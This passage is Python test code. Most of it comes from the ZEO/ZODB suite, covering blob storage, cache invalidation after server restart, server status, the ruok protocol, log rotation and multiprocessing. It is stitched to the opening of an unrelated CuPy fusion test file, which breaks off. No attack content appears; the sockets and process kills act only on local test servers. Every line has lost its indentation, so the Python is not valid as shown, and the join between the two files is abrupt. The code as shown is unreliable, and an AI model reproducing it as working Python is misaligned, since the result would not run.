somedata = b'a' * 10
blob = Blob()
with blob.open('w') as bd_fh:
bd_fh.write(somedata)
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
self.assertTrue(os.path.exists(tfname))
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
revid = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
self.assertTrue(not os.path.exists(tfname))
filename = self._storage.fshelper.getBlobFilename(oid, revid)
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(somedata, f.read())
def checkStoreBlob_wrong_partition(self):
os_rename = os.rename
try:
def fail(*a):
raise OSError
os.rename = fail
self.checkStoreBlob()
finally:
os.rename = os_rename
def checkLoadBlob(self):
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import zodb_pickle, ZERO
import transaction
somedata = b'a' * 10
blob = Blob()
with blob.open('w') as bd_fh:
bd_fh.write(somedata)
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
serial = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
filename = self._storage.loadBlob(oid, serial)
with open(filename, 'rb') as f:
self.assertEqual(somedata, f.read())
self.assertTrue(not(os.stat(filename).st_mode & stat.S_IWRITE))
self.assertTrue((os.stat(filename).st_mode & stat.S_IREAD))
def checkTemporaryDirectory(self):
self.assertEqual(os.path.join(self.blob_cache_dir, 'tmp'),
self._storage.temporaryDirectory())
def checkTransactionBufferCleanup(self):
oid = self._storage.new_oid()
with open('blob_file', 'wb') as f:
f.write(b'I am a happy blob.')
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.storeBlob(
oid, ZODB.utils.z64, 'foo', 'blob_file', '', t)
self._storage.close()
class BlobAdaptedFileStorageTests(FullGenericTests, CommonBlobTests):
"""ZEO backed by a BlobStorage-adapted FileStorage."""
def checkStoreAndLoadBlob(self):
import transaction
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.StorageTestBase import zodb_pickle
somedata_path = os.path.join(self.blob_cache_dir, 'somedata')
with open(somedata_path, 'w+b') as somedata:
for i in range(1000000):
somedata.write(("%s\n" % i).encode('ascii'))
def check_data(path):
self.assertTrue(os.path.exists(path))
somedata.seek(0)
d1 = d2 = 1
with open(path, 'rb') as f:
while d1 or d2:
d1 = f.read(8096)
d2 = somedata.read(8096)
self.assertEqual(d1, d2)
somedata.seek(0)
blob = Blob()
with blob.open('w') as bd_fh:
ZODB.utils.cp(somedata, bd_fh)
bd_fh.close()
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
self.assertTrue(os.path.exists(tfname))
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
revid = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
# The uncommitted data file should have been removed
self.assertTrue(not os.path.exists(tfname))
# The file should be in the cache ...
filename = self._storage.fshelper.getBlobFilename(oid, revid)
check_data(filename)
# ... and on the server
server_filename = os.path.join(
self.blobdir,
ZODB.blob.BushyLayout().getBlobFilePath(oid, revid),
)
self.assertTrue(server_filename.startswith(self.blobdir))
check_data(server_filename)
# If we remove it from the cache and call loadBlob, it should
# come back. We can do this in many threads.
ZODB.blob.remove_committed(filename)
returns = []
threads = [
threading.Thread(
target=lambda :
returns.append(self._storage.loadBlob(oid, revid))
)
for i in range(10)
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
[self.assertEqual(r, filename) for r in returns]
check_data(filename)
class BlobWritableCacheTests(FullGenericTests, CommonBlobTests):
blob_cache_dir = 'blobs'
shared_blob_dir = True
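# FauxConn and StorageServerWrapper below let the doctests drive a server-side
# ZEO.StorageServer.ZEOStorage directly, with no network involved: FauxConn
# stands in for a client connection (it just records serials passed via
# 'serialnos'), and StorageServerWrapper adapts the server object to the
# storage API that ZODB.DB expects.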
class FauxConn(object):
addr = 'x'
protocol_version = ZEO.asyncio.server.best_protocol_version
peer_protocol_version = protocol_version
serials = []
def async_(self, method, *args):
if method == 'serialnos':
self.serials.extend(args[0])
call_soon_threadsafe = async_threadsafe = async_
class StorageServerWrapper(object):
def __init__(self, server, storage_id):
self.storage_id = storage_id
self.server = ZEO.StorageServer.ZEOStorage(server, server.read_only)
self.server.notify_connected(FauxConn())
self.server.register(storage_id, False)
def sortKey(self):
return self.storage_id
def __getattr__(self, name):
return getattr(self.server, name)
def registerDB(self, *args):
pass
def supportsUndo(self):
return False
def new_oid(self):
return self.server.new_oids(1)[0]
def tpc_begin(self, transaction):
self.server.tpc_begin(id(transaction), '', '', {}, None, ' ')
def tpc_vote(self, transaction):
result = self.server.vote(id(transaction))
assert result == self.server.connection.serials[:]
del self.server.connection.serials[:]
return result
def store(self, oid, serial, data, version_ignored, transaction):
self.server.storea(oid, serial, data, id(transaction))
def send_reply(self, _, result): # Masquerade as conn
self._result = result
def tpc_abort(self, transaction):
self.server.tpc_abort(id(transaction))
def tpc_finish(self, transaction, func = lambda: None):
self.server.tpc_finish(id(transaction)).set_sender(0, self)
return self._result
def multiple_storages_invalidation_queue_is_not_insane():
"""
>>> from ZEO.StorageServer import StorageServer, ZEOStorage
>>> from ZODB.FileStorage import FileStorage
>>> from ZODB.DB import DB
>>> from persistent.mapping import PersistentMapping
>>> from transaction import commit
>>> fs1 = FileStorage('t1.fs')
>>> fs2 = FileStorage('t2.fs')
>>> server = StorageServer(None, storages=dict(fs1=fs1, fs2=fs2))
>>> s1 = StorageServerWrapper(server, 'fs1')
>>> s2 = StorageServerWrapper(server, 'fs2')
>>> db1 = DB(s1); conn1 = db1.open()
>>> db2 = DB(s2); conn2 = db2.open()
>>> commit()
>>> o1 = conn1.root()
>>> for i in range(10):
... o1.x = PersistentMapping(); o1 = o1.x
... commit()
>>> last = fs1.lastTransaction()
>>> for i in range(5):
... o1.x = PersistentMapping(); o1 = o1.x
... commit()
>>> o2 = conn2.root()
>>> for i in range(20):
... o2.x = PersistentMapping(); o2 = o2.x
... commit()
>>> trans, oids = s1.getInvalidations(last)
>>> from ZODB.utils import u64
>>> sorted([int(u64(oid)) for oid in oids])
[10, 11, 12, 13, 14, 15]
>>> fs1.close(); fs2.close()
"""
def getInvalidationsAfterServerRestart():
"""
Clients were often forced to verify their caches after a server
restart even if there weren't many transactions between the server
restart and the client connect.
Let's create a file storage and stuff some data into it:
>>> from ZEO.StorageServer import StorageServer, ZEOStorage
>>> from ZODB.FileStorage import FileStorage
>>> from ZODB.DB import DB
>>> from persistent.mapping import PersistentMapping
>>> fs = FileStorage('t.fs')
>>> db = DB(fs)
>>> conn = db.open()
>>> from transaction import commit
>>> last = []
>>> for i in range(100):
... conn.root()[i] = PersistentMapping()
... commit()
... last.append(fs.lastTransaction())
>>> db.close()
Now we'll open a storage server on the data, simulating a restart:
>>> fs = FileStorage('t.fs')
>>> sv = StorageServer(None, dict(fs=fs))
>>> s = ZEOStorage(sv, sv.read_only)
>>> s.notify_connected(FauxConn())
>>> s.register('fs', False) == fs.lastTransaction()
True
If we ask for the last transaction, we should get the last transaction
we saved:
>>> s.lastTransaction() == last[-1]
True
If a storage implements the method lastInvalidations, as FileStorage
does, then the storage server will populate its invalidation data
structure using lastInvalidations.
>>> tid, oids = s.getInvalidations(last[-10])
>>> tid == last[-1]
True
>>> from ZODB.utils import u64
>>> sorted([int(u64(oid)) for oid in oids])
[0, 92, 93, 94, 95, 96, 97, 98, 99, 100]
>>> fs.close()
If a storage doesn't implement lastInvalidations, a client can still
avoid verifying its cache if it was up to date when the server
restarted. To illustrate this, we'll create a subclass of FileStorage
without this method:
>>> class FS(FileStorage):
... lastInvalidations = property()
>>> fs = FS('t.fs')
>>> sv = StorageServer(None, dict(fs=fs))
>>> st = StorageServerWrapper(sv, 'fs')
>>> s = st.server
Now, if we ask for the invalidations since the last committed
transaction, we'll get a result:
>>> tid, oids = s.getInvalidations(last[-1])
>>> tid == last[-1]
True
>>> oids
[]
>>> db = DB(st); conn = db.open()
>>> ob = conn.root()
>>> for i in range(5):
... ob.x = PersistentMapping(); ob = ob.x
... commit()
... last.append(fs.lastTransaction())
>>> ntid, oids = s.getInvalidations(tid)
>>> ntid == last[-1]
True
>>> sorted([int(u64(oid)) for oid in oids])
[0, 101, 102, 103, 104, 105]
Note that in all cases invalidations include both modified objects and objects
that were only created.
>>> fs.close()
"""
def tpc_finish_error():
r"""Server errors in tpc_finish weren't handled properly.
If there are errors applying changes to the client cache, don't
leave the cache in an inconsistent state.
>>> addr, admin = start_server()
>>> client = ZEO.client(addr)
>>> db = ZODB.DB(client)
>>> conn = db.open()
>>> conn.root.x = 1
>>> t = conn.transaction_manager.get()
>>> conn.tpc_begin(t)
>>> conn.commit(t)
>>> transaction_meta_data = t.data(conn)
>>> _ = client.tpc_vote(transaction_meta_data)
Cause some breakage by messing with the client's transaction
buffer, sadly, using implementation details:
>>> tbuf = client._check_trans(transaction_meta_data, 'test')
>>> tbuf.client_resolved = None
tpc_finish will fail:
>>> client.tpc_finish(transaction_meta_data) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: ...
>>> client.tpc_abort(transaction_meta_data)
>>> t.abort()
But we can still load the saved data:
>>> conn2 = db.open()
>>> conn2.root.x
1
And we can save new data:
>>> conn2.root.x += 1
>>> conn2.transaction_manager.commit()
>>> db.close()
>>> stop_server(admin)
"""
def test_prefetch(self):
"""The client storage prefetch method pre-fetches from the server
>>> count = 999
>>> import ZEO
>>> addr, stop = start_server()
>>> conn = ZEO.connection(addr)
>>> root = conn.root()
>>> cls = root.__class__
>>> for i in range(count):
... root[i] = cls()
>>> conn.transaction_manager.commit()
>>> oids = [root[i]._p_oid for i in range(count)]
>>> conn.close()
>>> conn = ZEO.connection(addr)
>>> storage = conn.db().storage
>>> len(storage._cache) <= 1
True
>>> storage.prefetch(oids, conn._storage._start)
The prefetch returns before the cache is filled:
>>> len(storage._cache) < count
True
But it is filled eventually:
>>> from zope.testing.wait import wait
>>> wait(lambda : len(storage._cache) > count)
>>> loads = storage.server_status()['loads']
Now if we reload the data, it will be satisfied from the cache:
>>> for oid in oids:
... _ = conn._storage.load(oid)
>>> storage.server_status()['loads'] == loads
True
>>> conn.close()
"""
def client_has_newer_data_than_server():
"""It is bad if a client has newer data than the server.
>>> db = ZODB.DB('Data.fs')
>>> db.close()
>>> r = shutil.copyfile('Data.fs', 'Data.save')
>>> addr, admin = start_server(keep=1)
>>> db = ZEO.DB(addr, name='client', max_disconnect_poll=.01)
>>> wait_connected(db.storage)
>>> conn = db.open()
>>> conn.root().x = 1
>>> transaction.commit()
OK, we've added some data to the storage and the client cache has
the new data. Now, we'll stop the server, put back the old data, and
see what happens. :)
>>> stop_server(admin)
>>> r = shutil.copyfile('Data.save', 'Data.fs')
>>> import zope.testing.loggingsupport
>>> handler = zope.testing.loggingsupport.InstalledHandler(
... 'ZEO', level=logging.ERROR)
>>> formatter = logging.Formatter('%(name)s %(levelname)s %(message)s')
>>> _, admin = start_server(addr=addr)
>>> wait_until('got enough errors', lambda:
... len([x for x in handler.records
... if x.levelname == 'CRITICAL' and
... 'Client has seen newer transactions than server!' in x.msg
... ]) >= 2)
Note that the errors repeat because the client keeps on trying to connect.
>>> db.close()
>>> handler.uninstall()
>>> stop_server(admin)
"""
def history_over_zeo():
"""
>>> addr, _ = start_server()
>>> db = ZEO.DB(addr)
>>> wait_connected(db.storage)
>>> conn = db.open()
>>> conn.root().x = 0
>>> transaction.commit()
>>> len(db.history(conn.root()._p_oid, 99))
2
>>> db.close()
"""
def dont_log_poskeyerrors_on_server():
"""
>>> addr, admin = start_server(log='server.log')
>>> cs = ClientStorage(addr)
>>> cs.load(ZODB.utils.p64(1))
Traceback (most recent call last):
...
POSKeyError: 0x01
>>> cs.close()
>>> stop_server(admin)
>>> with open('server.log') as f:
... 'POSKeyError' in f.read()
False
"""
def open_convenience():
"""Often, we just want to open a single connection.
>>> addr, _ = start_server(path='data.fs')
>>> conn = ZEO.connection(addr)
>>> conn.root()
{}
>>> conn.root()['x'] = 1
>>> transaction.commit()
>>> conn.close()
Let's make sure the database was closed when we closed the
connection, and that the data is there.
>>> db = ZEO.DB(addr)
>>> conn = db.open()
>>> conn.root()
{'x': 1}
>>> db.close()
"""
def client_asyncore_thread_has_name():
"""
>>> addr, _ = start_server()
>>> db = ZEO.DB(addr)
>>> any(t for t in threading.enumerate()
... if ' zeo client networking thread' in t.getName())
True
>>> db.close()
"""
def runzeo_without_configfile():
"""
>>> with open('runzeo', 'w') as r:
... _ = r.write('''
... import sys
... sys.path[:] = %r
... import ZEO.runzeo
... ZEO.runzeo.main(sys.argv[1:])
... ''' % sys.path)
>>> import subprocess, re
>>> print(re.sub(br'\d\d+|[:]', b'', subprocess.Popen(
... [sys.executable, 'runzeo', '-a:0', '-ft', '--test'],
... stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
... ).stdout.read()).decode('ascii'))
... # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
------
--T INFO ZEO.runzeo () opening storage '1' using FileStorage
------
--T INFO ZEO.StorageServer StorageServer created RW with storages 1RWt
------
--T INFO ZEO.asyncio... listening on ...
------
--T INFO ZEO.StorageServer closing storage '1'
testing exit immediately
"""
def close_client_storage_w_invalidations():
r"""
Invalidations could cause errors when closing client storages,
>>> addr, _ = start_server()
>>> writing = threading.Event()
>>> def mad_write_thread():
... global writing
... conn = ZEO.connection(addr)
... writing.set()
... while writing.isSet():
... conn.root.x = 1
... transaction.commit()
... conn.close()
>>> thread = threading.Thread(target=mad_write_thread)
>>> thread.setDaemon(True)
>>> thread.start()
>>> _ = writing.wait()
>>> time.sleep(.01)
>>> for i in range(10):
... conn = ZEO.connection(addr)
... _ = conn._storage.load(b'\0'*8)
... conn.close()
>>> writing.clear()
>>> thread.join(1)
"""
def convenient_to_pass_port_to_client_and_ZEO_dot_client():
"""Jim hates typing
>>> addr, _ = start_server()
>>> client = ZEO.client(addr[1])
>>> client.__name__ == "('127.0.0.1', %s)" % addr[1]
True
>>> client.close()
"""
@forker.skip_if_testing_client_against_zeo4
def test_server_status():
"""
You can get server status using the server_status method.
>>> addr, _ = start_server(zeo_conf=dict(transaction_timeout=1))
>>> db = ZEO.DB(addr)
>>> pprint.pprint(db.storage.server_status(), width=40)
{'aborts': 0,
'active_txns': 0,
'commits': 1,
'conflicts': 0,
'conflicts_resolved': 0,
'connections': 1,
'last-transaction': '03ac11b771fa1c00',
'loads': 1,
'lock_time': None,
'start': 'Tue May 4 10:55:20 2010',
'stores': 1,
'timeout-thread-is-alive': True,
'waiting': 0}
>>> db.close()
"""
@forker.skip_if_testing_client_against_zeo4
def test_ruok():
"""
You can also get server status using the ruok protocol.
>>> addr, _ = start_server(zeo_conf=dict(transaction_timeout=1))
>>> db = ZEO.DB(addr) # force a transaction :)
>>> import json, socket, struct
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(addr)
>>> writer = s.makefile(mode='wb')
>>> _ = writer.write(struct.pack(">I", 4)+b"ruok")
>>> writer.close()
>>> proto = s.recv(struct.unpack(">I", s.recv(4))[0])
>>> data = json.loads(
... s.recv(struct.unpack(">I", s.recv(4))[0]).decode("ascii"))
>>> pprint.pprint(data['1'])
{u'aborts': 0,
u'active_txns': 0,
u'commits': 1,
u'conflicts': 0,
u'conflicts_resolved': 0,
u'connections': 1,
u'last-transaction': u'03ac11cd11372499',
u'loads': 1,
u'lock_time': None,
u'start': u'Sun Jan 4 09:37:03 2015',
u'stores': 1,
u'timeout-thread-is-alive': True,
u'waiting': 0}
>>> db.close(); s.close()
"""
def client_labels():
"""
When looking at server logs, for servers with lots of clients coming
from the same machine, it can be very difficult to correlate server
log entries with actual clients. It's possible, sort of, but tedious.
You can make this easier by passing a label to the ClientStorage
constructor.
>>> addr, _ = start_server(log='server.log')
>>> db = ZEO.DB(addr, client_label='test-label-1')
>>> db.close()
>>> @wait_until
... def check_for_test_label_1():
... with open('server.log') as f:
... for line in f:
... if 'test-label-1' in line:
... print(line.split()[1:4])
... return True
['INFO', 'ZEO.StorageServer', '(test-label-1']
You can specify the client label via a configuration file as well:
>>> import ZODB.config
>>> db = ZODB.config.databaseFromString('''
... <zodb>
... <zeoclient>
... server :%s
... client-label test-label-2
... </zeoclient>
... </zodb>
... ''' % addr[1])
>>> db.close()
>>> @wait_until
... def check_for_test_label_2():
... with open('server.log') as f:
... for line in f:
... if 'test-label-2' in line:
... print(line.split()[1:4])
... return True
['INFO', 'ZEO.StorageServer', '(test-label-2']
"""
def invalidate_client_cache_entry_on_server_commit_error():
"""
When the serials returned during commit include an error, typically a
conflict error, invalidate the cache entry. This is important when
the cache is messed up.
>>> addr, _ = start_server()
>>> conn1 = ZEO.connection(addr)
>>> conn1.root.x = conn1.root().__class__()
>>> transaction.commit()
>>> conn1.root.x
{}
>>> cs = ZEO.ClientStorage.ClientStorage(addr, client='cache')
>>> conn2 = ZODB.connection(cs)
>>> conn2.root.x
{}
>>> conn2.close()
>>> cs.close()
>>> conn1.root.x['x'] = 1
>>> transaction.commit()
>>> conn1.root.x
{'x': 1}
Now, let's screw up the cache by making it have a last tid that is later than
the root serial.
>>> import ZEO.cache
>>> cache = ZEO.cache.ClientCache('cache-1.zec')
>>> cache.setLastTid(p64(u64(conn1.root.x._p_serial)+1))
>>> cache.close()
We'll also update the server so that its last tid is newer than the cache's:
>>> conn1.root.y = 1
>>> transaction.commit()
>>> conn1.root.y = 2
>>> transaction.commit()
Now, if we reopen the client storage, we'll get the wrong root:
>>> cs = ZEO.ClientStorage.ClientStorage(addr, client='cache')
>>> conn2 = ZODB.connection(cs)
>>> conn2.root.x
{}
And, we'll get a conflict error if we try to modify it:
>>> conn2.root.x['y'] = 1
>>> transaction.commit() # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ConflictError: ...
But, if we abort, we'll get up to date data and we'll see the changes.
>>> transaction.abort()
>>> conn2.root.x
{'x': 1}
>>> conn2.root.x['y'] = 1
>>> transaction.commit()
>>> sorted(conn2.root.x.items())
[('x', 1), ('y', 1)]
>>> conn2.close()
>>> cs.close()
>>> conn1.close()
"""
script_template = """
import sys
sys.path[:] = %(path)r
%(src)s
"""
def generate_script(name, src):
with open(name, 'w') as f:
f.write(script_template % dict(
exe=sys.executable,
path=sys.path,
src=src,
))
def read(filename):
with open(filename) as f:
return f.read()
def runzeo_logrotate_on_sigusr2():
"""
>>> from ZEO.tests.forker import get_port
>>> port = get_port()
>>> with open('c', 'w') as r:
... _ = r.write('''
... <zeo>
... address %s
... </zeo>
... <mappingstorage>
... </mappingstorage>
... <eventlog>
... <logfile>
... path l
... </logfile>
... </eventlog>
... ''' % port)
>>> generate_script('s', '''
... import ZEO.runzeo
... ZEO.runzeo.main()
... ''')
>>> import subprocess, signal
>>> p = subprocess.Popen([sys.executable, 's', '-Cc'], close_fds=True)
>>> wait_until('started',
... lambda : os.path.exists('l') and ('listening on' in read('l'))
... )
>>> oldlog = read('l')
>>> os.rename('l', 'o')
>>> os.kill(p.pid, signal.SIGUSR2)
>>> s = ClientStorage(port)
>>> s.close()
>>> wait_until('See logging', lambda : ('Log files ' in read('l')))
>>> read('o') == oldlog # No new data in old log
True
# Cleanup:
>>> os.kill(p.pid, signal.SIGKILL)
>>> _ = p.wait()
"""
def unix_domain_sockets():
"""Make sure unix domain sockets work
>>> addr, _ = start_server(port='./sock')
>>> c = ZEO.connection(addr)
>>> c.root.x = 1
>>> transaction.commit()
>>> c.close()
"""
def gracefully_handle_abort_while_storing_many_blobs():
r"""
>>> import logging, sys
>>> old_level = logging.getLogger().getEffectiveLevel()
>>> logging.getLogger().setLevel(logging.ERROR)
>>> handler = logging.StreamHandler(sys.stdout)
>>> logging.getLogger().addHandler(handler)
>>> addr, _ = start_server(blob_dir='blobs')
>>> client = ZEO.client(addr, blob_dir='cblobs')
>>> c = ZODB.connection(client)
>>> c.root.x = ZODB.blob.Blob(b'z'*(1<<20))
>>> c.root.y = ZODB.blob.Blob(b'z'*(1<<2))
>>> t = c.transaction_manager.get()
>>> c.tpc_begin(t)
>>> c.commit(t)
We've called commit, but the blob sends are queued. We'll call abort
right away, which will delete the temporary blob files. The queued
iterators will try to open these files.
>>> c.tpc_abort(t)
Now we'll try to use the connection, mainly to wait for everything to
get processed. Before we fixed this by making tpc_finish a synchronous
call to the server, we'd get some sort of error here.
>>> _ = client._call('loadBefore', b'\0'*8, maxtid)
>>> c.close()
>>> logging.getLogger().removeHandler(handler)
>>> logging.getLogger().setLevel(old_level)
"""
def ClientDisconnected_errors_are_TransientErrors():
"""
>>> from ZEO.Exceptions import ClientDisconnected
>>> from transaction.interfaces import TransientError
>>> issubclass(ClientDisconnected, TransientError)
True
"""
if not os.environ.get('ZEO4_SERVER'):
if os.environ.get('ZEO_MSGPACK'):
def test_runzeo_msgpack_support():
"""
>>> import ZEO
>>> a, s = ZEO.server(threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'M5'
>>> conn.close(); s()
"""
else:
def test_runzeo_msgpack_support():
"""
>>> import ZEO
>>> a, s = ZEO.server(threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'Z5'
>>> conn.close(); s()
>>> a, s = ZEO.server(zeo_conf=dict(msgpack=True), threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'M5'
>>> conn.close(); s()
"""
if WIN:
del runzeo_logrotate_on_sigusr2
del unix_domain_sockets
def work_with_multiprocessing_process(name, addr, q):
conn = ZEO.connection(addr)
q.put((name, conn.root.x))
conn.close()
class MultiprocessingTests(unittest.TestCase):
layer = ZODB.tests.util.MininalTestLayer('work_with_multiprocessing')
def test_work_with_multiprocessing(self):
"Client storage should work with multi-processing."
# Gaaa, zope.testing.runner.FakeInputContinueGenerator has no close
if not hasattr(sys.stdin, 'close'):
sys.stdin.close = lambda : None
if not hasattr(sys.stdin, 'fileno'):
sys.stdin.fileno = lambda : -1
self.globs = {}
forker.setUp(self)
addr, adminaddr = self.globs['start_server']()
conn = ZEO.connection(addr)
conn.root.x = 1
transaction.commit()
q = multiprocessing.Queue()
processes = [multiprocessing.Process(
target=work_with_multiprocessing_process,
args=(i, addr, q))
for i in range(3)]
_ = [p.start() for p in processes]
self.assertEqual(sorted(q.get(timeout=300) for p in processes),
[(0, 1), (1, 1), (2, 1)])
_ = [p.join(30) for p in processes]
conn.close()
zope.testing.setupstack.tearDown(self)
@forker.skip_if_testing_client_against_zeo4
def quick_close_doesnt_kill_server():
r"""
Start a server:
>>> from .testssl import server_config, client_ssl
>>> addr, _ = start_server(zeo_conf=server_config)
Now connect and immediately disconnect. This caused the server to
die in the past:
>>> import socket, struct
>>> for i in range(5):
... s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
... s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
... struct.pack('ii', 1, 0))
... s.connect(addr)
... s.close()
>>> print("\n\nXXX WARNING: running quick_close_doesnt_kill_server with ssl as hack pending http://bugs.python.org/issue27386\n", file=sys.stderr) # Intentional long line to be annoying till this is fixed
Now we should be able to connect as normal:
>>> db = ZEO.DB(addr, ssl=client_ssl())
>>> db.storage.is_connected()
True
>>> db.close()
"""
def can_use_empty_string_for_local_host_on_client():
"""We should be able to spell localhost with ''.
>>> (_, port), _ = start_server()
>>> conn = ZEO.connection(('', port))
>>> conn.root()
{}
>>> conn.root.x = 1
>>> transaction.commit()
>>> conn.close()
"""
slow_test_classes = [
BlobAdaptedFileStorageTests, BlobWritableCacheTests,
MappingStorageTests, DemoStorageTests,
FileStorageTests,
FileStorageHexTests, FileStorageClientHexTests,
]
if not forker.ZEO4_SERVER:
slow_test_classes.append(FileStorageSSLTests)
quick_test_classes = [FileStorageRecoveryTests, ZRPCConnectionTests]
class ServerManagingClientStorage(ClientStorage):
def __init__(self, name, blob_dir, shared=False, extrafsoptions=''):
if shared:
server_blob_dir = blob_dir
else:
server_blob_dir = 'server-'+blob_dir
self.globs = {}
addr, stop = forker.start_zeo_server(
"""
<blobstorage>
blob-dir %s
<filestorage>
path %s
%s
</filestorage>
</blobstorage>
""" % (server_blob_dir, name+'.fs', extrafsoptions),
)
zope.testing.setupstack.register(self, stop)
if shared:
ClientStorage.__init__(self, addr, blob_dir=blob_dir,
shared_blob_dir=True)
else:
ClientStorage.__init__(self, addr, blob_dir=blob_dir)
def close(self):
ClientStorage.close(self)
zope.testing.setupstack.tearDown(self)
def create_storage_shared(name, blob_dir):
return ServerManagingClientStorage(name, blob_dir, True)
class ServerManagingClientStorageForIExternalGCTest(
ServerManagingClientStorage):
def pack(self, t=None, referencesf=None):
ServerManagingClientStorage.pack(self, t, referencesf, wait=True)
# Packing doesn't clear old versions out of zeo client caches,
# so we'll clear the caches.
self._cache.clear()
ZEO.ClientStorage._check_blob_cache_size(self.blob_dir, 0)
def test_suite():
suite = unittest.TestSuite((
unittest.makeSuite(Test_convenience_functions),
))
zeo = unittest.TestSuite()
zeo.addTest(unittest.makeSuite(ZODB.tests.util.AAAA_Test_Runner_Hack))
patterns = [
(re.compile(r"u?'start': u?'[^\n]+'"), 'start'),
(re.compile(r"u?'last-transaction': u?'[0-9a-f]+'"),
'last-transaction'),
(re.compile("ZODB.POSException.ConflictError"), "ConflictError"),
(re.compile("ZODB.POSException.POSKeyError"), "POSKeyError"),
(re.compile("ZEO.Exceptions.ClientStorageError"), "ClientStorageError"),
(re.compile(r"\[Errno \d+\]"), '[Errno N]'),
(re.compile(r"loads=\d+\.\d+"), 'loads=42.42'),
# Python 3 drops the u prefix
(re.compile("u('.*?')"), r"\1"),
(re.compile('u(".*?")'), r"\1")
]
if not PY3:
patterns.append((re.compile("^'(blob[^']*)'"), r"b'\1'"))
patterns.append((re.compile("^'Z308'"), "b'Z308'"))
zeo.addTest(doctest.DocTestSuite(
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
))
zeo.addTest(doctest.DocTestSuite(
ZEO.tests.IterationTests,
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing((
(re.compile("ZEO.Exceptions.ClientDisconnected"),
"ClientDisconnected"),
)),
))
if not forker.ZEO4_SERVER:
# ZEO 4 doesn't support client-side conflict resolution
zeo.addTest(unittest.makeSuite(ClientConflictResolutionTests, 'check'))
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-misc')
suite.addTest(zeo)
zeo = unittest.TestSuite()
zeo.addTest(
doctest.DocFileSuite(
'zdoptions.test',
'drop_cache_rather_than_verify.txt', 'client-config.test',
'protocols.test', 'zeo_blob_cache.test', 'invalidation-age.txt',
'../nagios.rst',
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
),
)
zeo.addTest(PackableStorage.IExternalGC_suite(
lambda :
ServerManagingClientStorageForIExternalGCTest(
'data.fs', 'blobs', extrafsoptions='pack-gc false')
))
for klass in quick_test_classes:
zeo.addTest(unittest.makeSuite(klass, "check"))
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-misc2')
suite.addTest(zeo)
# tests that often fail, maybe if they have their own layers
for name in 'zeo-fan-out.test', 'new_addr.test':
zeo = unittest.TestSuite()
zeo.addTest(
doctest.DocFileSuite(
name,
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
),
)
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-' + name)
suite.addTest(zeo)
suite.addTest(unittest.makeSuite(MultiprocessingTests))
# Put the heavyweights in their own layers
for klass in slow_test_classes:
sub = unittest.makeSuite(klass, "check")
sub.layer = ZODB.tests.util.MininalTestLayer(klass.__name__)
suite.addTest(sub)
suite.addTest(ZODB.tests.testblob.storage_reusable_suite(
'ClientStorageNonSharedBlobs', ServerManagingClientStorage))
suite.addTest(ZODB.tests.testblob.storage_reusable_suite(
'ClientStorageSharedBlobs', create_storage_shared))
if not forker.ZEO4_SERVER:
from .threaded import threaded_server_tests
dynamic_server_ports_suite = doctest.DocFileSuite(
'dynamic_server_ports.test',
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
)
dynamic_server_ports_suite.layer = threaded_server_tests
suite.addTest(dynamic_server_ports_suite)
return suite
if __name__ == "__main__":
unittest.main(defaultTest="test_suite")
|
test_fusion.py
|
import mock
import numpy
import six
import threading
import unittest
import cupy
from cupy import testing
def fusion_default_array_equal():
def deco(func):
def wrapper(self_x, name, xp, **dtypes):
@cupy.fuse()
def f(*args):
return getattr(xp, name)(*args)
args = func(self_x, name, xp, **dtypes)
return f(*args)
return wrapper
return deco
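# Illustrative sketch (not part of the test suite): at call time the decorator
# above builds a fused wrapper equivalent to writing one out by hand, as below,
# so the named ufunc runs through cupy.fuse on both the numpy and cupy code
# paths. The ufunc chosen here (sqrt) is an arbitrary example.
@cupy.fuse()
def _example_fused_sqrt(x):
    return cupy.sqrt(x)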
@testing.gpu
class TestFusionElementwise(unittest.TestCase):
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
return (a,)
